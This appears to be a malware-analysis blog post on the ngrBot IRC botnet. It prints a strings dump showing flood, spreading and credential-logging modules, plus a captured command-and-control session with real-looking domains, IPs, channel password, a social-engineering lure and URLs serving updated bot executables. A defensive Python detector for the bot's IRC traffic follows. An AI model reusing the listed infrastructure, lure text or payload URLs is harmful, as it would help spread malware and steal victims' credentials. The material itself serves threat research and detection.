@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"""""""""""""""" @@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@x lalorlz1.info ROCKR rlz1lola.info ROCKR rlz01jm.info ROCKR #ROCK ngrBot ELPERRO ]1.1.0.0 CUSTOMER FvLQ49IlzIyLjj6m msn.set msn.int http.set http.int http.inj mdns stats speed logins slow ssyn stop F4XA gGWHXA 5hXA ZpXA ` WA f0WA u{A<WA [@WA PASS %s [.ShellClassInfo] CLSID={645FF040-5081-101B-9F08-00AA002F954E} USER %s 0 0 :%s NICK %s JOIN %s %s PART %s PRIVMSG %s :%s QUIT :%s PONG %s PING PRIVMSG [v="%s" c="%s" h="%s" p="%S"] [d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d [d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d [Slowloris]: Starting flood on "%s" for %d minute(s) [Slowloris]: Finished flood on "%s" [UDP]: Starting flood on "%s:%d" for %d second(s) [UDP]: Finished flood on "%s:%d" [SYN]: Starting flood on "%s:%d" for %d second(s) [SYN]: Finished flood on "%s:%d" [USB]: Infected %s [MSN]: Updated MSN spread message to "%s" [MSN]: Updated MSN spread inte rval to "%s" [HTTP]: Updated HTTP spread message to "%s" [HTTP]: Injected value is now %s. [HTTP]: Updated HTTP spread interval to "%s" [Visit]: Visited "%s" [DNS]: Blocked "%s" [usb="%d" msn="%d" http="%d" total="%d"] [ftp="%d" pop="%d" http="%d" total="%d"] [RSOCK4]: Started rsock4 on "%s:%d" [RSOCK4]: Stopped rsock4 [d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s) [d="%s"] Error downloading file [e="%d"] [d="%s"] Error writing download to "%S" [e="%d"] [d="%s" s="%d bytes"] Error creating process "%S" [e="%d"] [d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"] [d="%s"] Error getting temporary filename. 
[e="%d"] [d='%s"] Error getting application data path [e="%d"] [Visit]: Error visitng "%s" [FTP Login]: %s [POP3 Login]: %s [FTP Infect]: %s was iframed [HTTP Login]: %s [HTTP Traffic]: %s [Ruskill]: Detected File: "%s" [Ruskill]: Detected DNS: "%s" [Ruskill]: Detected Reg: "%s" [PDef+]: %s [DNS]: Blocked DNS "%s" [MSN]: %s [HTTP]: %s ftplog poplog ftpinfect httplogin httptraff ruskill rdns rreg httpspread http://api.wipmania.com/ .pipe%08x_ipc 0;0G0O0V0d0n0s0 1)13181Y1e1u1|1 2C2c2 3 363M3j3u3 6(6/686J6O6T6m6 7 7(7O7V7_7 7=8T88 9#9:9W9^9f9~9 98:R:[: ;U<e<j<p< <g=o= >*>N> ?%?/?6?A?P? 0<0E0L0S0c0i0t0{0 2!3-4d4n4s4 5(5:5?5D5a5x5 6 6J6a6 7&7.7>7I7N7f7 1#2_2 8"8Q8X8g8q8 9':;:Y: <'<1<H<X<x< =%=7=D=K=Z=w=}= >@>R>>m> ?1?<?B?j? 0g0g1 1"2Q2~2 203N3 424>4^4 8;9~9 :K:';A;_; <4<><T<^<h< =*=>=D=N=l=u= >#>)>8>>>O>Y>^>p>u> ?8?L?c?u? 0$1-1H1N1_1n1 313Y3k3 414l4 515B5P5u5 676V6_6f6v6 889Y9r9 :-:G: ;#;(;2;7;<;A;F;W; <5<?<^< <W=l=|= =d>o>{> ?/?U?`?p? 1P2T2X2 3?4a4h4 5A5H5|5 7U8]8f8}8 9'9-939q9 : :%:n: ;1;J;d; <%<3<<<B<i<v< =$=+=0===E=L=T=o=v= =6>E> ?%?4?? 0'0K0 s0x0}0 091M1g1t1 3[3q3 3*494 4-575w5~5 5B6L6 6(7I7]7z7 848_9m9w9 :+:1:7:D:Q:V:e:t: ; ;,;8;L;Q;V;n;s;x;}; ;5<B<]<w< =5===B=N=S=g=l= 5"6-6B6L6Q6c6u6 7 70767=7L7R7 94:{: '010 1.1F1^1 2(2>2P2b2t2 4K5f5 6=6K6Y6 7*7/7L7S7r7 8]8i8 9+9;9A9G9d9q9w9}9 9/:b:h: ;!;S;`;h;s; ;E<e<w< =.=<=A=F=L=R=k=u= >#>,>X> ?-??y? 42484T4`4f4 4X5]5|5 6-646D6Q6[6b6g6q6z6 9 9&9<9G9R9W99q9v9 9::G:M:b:j:z: ;.;6;;;B;H;S;c;k; <+<F<T<`< =3=E=Q= >3>T>k>z> ?Z?r?{? %0<0V0h0 141>1l1 3g3r3 34c4 5*585R5w5 6!6<6R6a6 7=7C7T7g7z7 8-9L9w9 9-:D:W: ;#;4;:;T;Z; <#<(<-<2<7<P<j<w< =)=.=K=[=`=}= >+>I>V>[>s>z> ?*?H?T?a?g?u? 0,0J0Z0g0l0v0 1%101=1C1I1W1s1y1 2'212<2J2_2 3"3@3P3V3 4)4J4h4x4 535Q5s5 6!6.656D6S6`6m6z6 7?7E7 7'8,818[8w8 8.9K9V9s9 :':,:D:T:Y:r: ;2;7;W;r;w;|; <$<5<<<F<N<b< =(=I=O=Z=r=|= >V>g>|> >#?h? 
0-070D0x0 0@1G1 132D2Z2p2 3*343=3R3^3 3-434=4F5P5]5 536N6[6 637B7U7d7q7 818>8T8]8|8 9T9`9o9u9z9 :!:,:3:;:A:O:Y:f:l:r: ;(;3;9;?;Q;];c;i;{; <&<3<8<G<T<Z<`<n< <,=3=A=G=W=w=|= >@>E>> >W?`? 010C0H0M0a0f0k0 1 1$1<1M1U1 1-2O2z2 3I3Z3o3z3 4"4'4<4U4_4t4z4 575=5r5|5 6(6=6P6m6z6 7 767<7~7 8A8F8Y8c8j8 999C9 :%:,:3:=:F:e: ;+;=;D;X;];c;i;n; ;.<4<;<@<e<p<w< ="=*=0=;=F=O=Z=b=g=v={= =7>N>W>]> >&?7?~? 40;0A0Q0a0 2)2A2[2 2T3]3f5 6F6Y6t6 7I7Y7_7e7k7q7w7}7 8*808;8~8 9 9O9X9^9 9$:0:Q: :&;2;8;F; <"<2<=<Q<W<i< =$=*=4=:=E=K=S=e= >;>I> ?!?F?M?W? 1$1<1I1[1g1 2%2>2V2a2t2|2 373E3M3a3l3 3@4N4U4 5/565<5R5k5 666i6 7.7M7 8,818M8[8`8 8?9R9 :#:4:9:?:E:P:{: ;#;B;U;[;b;r; <!<o< =$=;=C=N=S=X=i=n=s=}= >">(>.>4>:>@>F>L>R>X>^>d>j>p>v>|> ?B?H?N?T?Z?`?f?l?r?x?~? 4 4$4(4,4044484<4@4D4H4L4P4T4X66`6h6l6p6t6x6|6 7D7L7X77`7d7h7l7p7t7 9(949@9L9X9d9p9|9 :$:0:<:H:T:`:l:x: ; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;;`;d;h; 4 4$4(4,4044484<4@4D4H4L4P4T4X44`4d4h4l4p4t4x4|4 5 5$5(5,5054585<5@5D5H5L5P5T5X55`5d5h5l5p5t5x5|5 6 6$6(6,6064686<6@6D6H6L6P6T6X66`6d6h6l6p6t6x6|6 7 7$7(7,7074787<7@7D7H7L7P7T7X77`7d7h7l7p7t7x7|7 8 8$8(8,8084888<8@8D8H8L8P8T8X88`8d8h8l8p8t8x8|8 8 9,989D9P99h9x9|9 : :(:,:0:8:<:@:X:`:d:h:l:p:x:|: ; ;$;(;,;0;8;<;@;D;H;P;T;X;;`;h;l;p;t;x; < <(<,<0<4<8<@<D<H<L<P<X<<`<d<h<p<t<|< =(=0=8=@=H=T==d=l= Unicode Strings: --------------------------------------------------------------------------- Ajjj jjjj jjjj jjjj $jjj Ajjj DBWIN .pipe kernel32.dll ntdll.dll Internet Exploreriexplore.exe autorun.inf pidgin.exe wlcomm.exe msnmsgr.exe msmsgs.exe flock.ex opera.exe chrome.exe ieuser.exe iexplore.exe firefox.exe HKCU HKLM Microsoft Unified Security Protocol Provider .ipconfig.exe verclsid.exe regedit.exe rundll32.exe cmd.exe regsvr32.exe l"%s" %S POST .exe lol.exe n127.0.0.1 %s:Zone.Identifier wininet.dll secur32.dll ws2_32.dll :%S%SDesktop.ini winlogon.exe explorer.exe Aadvapi32.dll urlmon.dll nspr4.dll dnsapi.dll Akernel23.dll y%s%s.exe lsass.exe Shell SoftwareMicrosoftWindowsCurrentVersionRun 
SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem .DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun
We have 2 new domains here:
rlz01jm.info - not active yet
rlz1lola.info - active
lalorlz1.info - this is an old domain, already posted in my blog
Resolved : [rlz1lola.info] To [176.9.192.215]
176.9.192.216:5236, PASS ROCKR - botnet server here
176.9.192.215:5236, PASS ROCKR - botnet server here
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to "mira este videito de jlo desnuda http://www.endenter.com/IMG00359268.JPG pufff mamacita |"
PRIVMSG #rockspread :[MSN]: Updated MSN spread message to "mira este videito de jlo desnuda http://www.endenter.com/IMG00359268.JPG pufff mamacita"
PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) - Redirected 16 domain(s)
PRIVMSG #ROCK :[d="http://www.endenter.com/wp-includes/css/update/30upjmrlzz.exe" s="116236 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Wcxaxw.exe" - Download retries: 0
NICK n{US|XPa}eovvenu
USER eovvenu 0 0 :eovvenu
JOIN #ROCK ngrBot
JOIN #rockspread
JOIN #US
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to "4"
PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to "4"
Now talking in #ROCK
Topic On: [ #ROCK ] [ ,up http://www.endenter.com/wp-includes/css/update/31upjmrlzz.exe 9702091B21C1A48955A5268D07E31EF6 | ,mdns http://www.endenter.com/wp-includes/css/update/dos.txt ]
Topic By: [ rockstar ]
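The IRC session above has a very regular shape: the bot registers with a NICK of the form n{COUNTRY|OSflags}random, joins its channel with the key "ngrBot", and then reports back as PRIVMSG lines prefixed with a bracketed module tag ([DNS]:, [HTTP]:, [MSN]:) or a [d="url" s="N bytes"] download record. As an added example, not code from the original post and not ngrBot's own code, here is a small Python classifier that a defender could run over captured IRC lines (from a sensor or proxy log) to flag these patterns. The sample lines are constructed to mirror the session above, with the download URL and local path replaced by placeholders.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Registration nick as seen in the capture: 'n' + {two-letter country|OS flags} + random letters.
NICK_RE = re.compile(r"^NICK\s+n\{(?P<country>[A-Z]{2})\|(?P<os>[A-Za-z0-9]+)\}(?P<rand>[a-z]+)$")
# Channel join using the literal key "ngrBot" (the key appears in the binary's strings).
JOIN_RE = re.compile(r"^JOIN\s+(?P<chan>#\S+)\s+ngrBot$")
# Download/update record: PRIVMSG #chan :[d="URL" s="N bytes"] text
UPDATE_RE = re.compile(
    r'^PRIVMSG\s+(?P<chan>#\S+)\s+:\[d="(?P<url>[^"]+)"\s+s="(?P<size>\d+) bytes"\]\s+(?P<text>.*)$'
)
# Generic status report: PRIVMSG #chan :[Module]: text
STATUS_RE = re.compile(r"^PRIVMSG\s+(?P<chan>#\S+)\s+:\[(?P<module>[^\]]+)\]:\s*(?P<text>.*)$")


@dataclass
class Alert:
    kind: str
    channel: Optional[str]
    detail: str


def classify_line(line: str) -> Optional[Alert]:
    """Return an Alert for a line matching one of the observed ngrBot patterns, else None."""
    line = line.strip()
    m = NICK_RE.match(line)
    if m:
        return Alert("ngrbot_nick", None, f"country={m['country']} os={m['os']}")
    m = JOIN_RE.match(line)
    if m:
        return Alert("ngrbot_join_key", m["chan"], "channel key 'ngrBot'")
    m = UPDATE_RE.match(line)
    if m:
        return Alert("ngrbot_download_report", m["chan"], f"url={m['url']} size={m['size']} text={m['text']}")
    m = STATUS_RE.match(line)
    if m:
        return Alert("ngrbot_status", m["chan"], f"module={m['module']} text={m['text']}")
    return None


def scan(lines: List[str]) -> List[Alert]:
    """Classify every line and keep only the ones that produced an alert."""
    return [a for a in (classify_line(l) for l in lines) if a is not None]


# Constructed sample, modelled on the session quoted in the post; URL and path are placeholders.
SAMPLE_IRC_LINES = [
    "NICK n{US|XPa}eovvenu",
    "USER eovvenu 0 0 :eovvenu",
    "JOIN #ROCK ngrBot",
    "PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) - Redirected 16 domain(s)",
    'PRIVMSG #ROCK :[d="http://example.invalid/update.exe" s="116236 bytes"] '
    'Updated bot file "C:\\placeholder\\bot.exe" - Download retries: 0',
    'PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to "4"',
    "PRIVMSG #general :hello everyone",  # benign chatter, must not alert
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_IRC_LINES):
        print(f"{alert.kind:24s} {alert.channel or '-':12s} {alert.detail}")
```

The registration pattern and the join key are the earliest signals in the session, so a sensor that only sees the first few lines of a connection can still raise an alert before any status traffic appears; the status-report regexes are broader and will also pick up the MSN, USB and FTP module messages listed in the binary's strings.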
Download samples here and here
Download
Hosting info:
http://whois.domaintools.com/176.9.192.215